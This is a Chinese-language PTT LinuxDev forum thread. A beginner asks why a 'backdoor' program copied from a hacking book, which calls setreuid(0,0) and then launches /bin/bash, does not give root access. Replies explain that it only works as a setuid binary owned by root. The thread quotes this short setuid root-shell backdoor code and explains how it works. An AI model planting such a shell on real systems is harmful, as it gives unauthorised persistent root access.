1. PTT
  2. LinuxDev

[问题] 关于后门程式

楼主: slshsb200300 (Javier)   2014-08-27 15:47:49
我这新手又来问菜问题了...囧
身边又没有会的人可问
只好厚著脸皮来了XD
刚在看骇客训练基地-决战台湾版这本书
看到后门程式时...程式码如下
#include <sys/types.h>
#include <unistd.h>
void main()
{
setreuid(0,0);
execl("/bin/bash","bash",(char *)0);
}
结果如下图
http://imgur.com/EM9LqYD
执行完后却无法像书上写的获得root权限
请问这是什么原因造成呢@@?
作者: mshockwave (夏克维夫)   2014-08-28 05:29:00
嗯...使用setreuid应该也要root权限你这应该是类似shellcode吧 也就是你的exploit要先破解拥有最高权限的程式或是取得适当权限 这样你在执行shellcode时才能拥有root权限
作者: lantw44 (#######################)   2014-08-29 14:18:00
suid-shell 的 拥有者 是 root 吗?
楼主: slshsb200300 (Javier)   2014-08-29 16:23:00
哈...感谢两位大大我看懂了T T
作者: mshockwave (夏克维夫)   2014-08-30 16:22:00
Re楼上上:yes
继续阅读
Re: [问题] 请问能不能查询link时连到哪个档案jservRe: [问题] embedded linux 有推荐的distribution吗jservRe: [问题] QT 触控问题jservRe: [问题] 编译RPI的kerneljserv[问题] QT 触控问题sho330[问题] 编译RPI的kerneltrans7749[问题] 如何学习找系统漏洞slshsb200300[问题] embedded linux 有推荐的distribution吗ss780217[问题] 请问能不能查询link时连到哪个档案jianiauRe: [问题] linux driver初始化时从SD卡加载configghostplayer

Links booklink

Contact Us: admin [ a t ] ucptt.com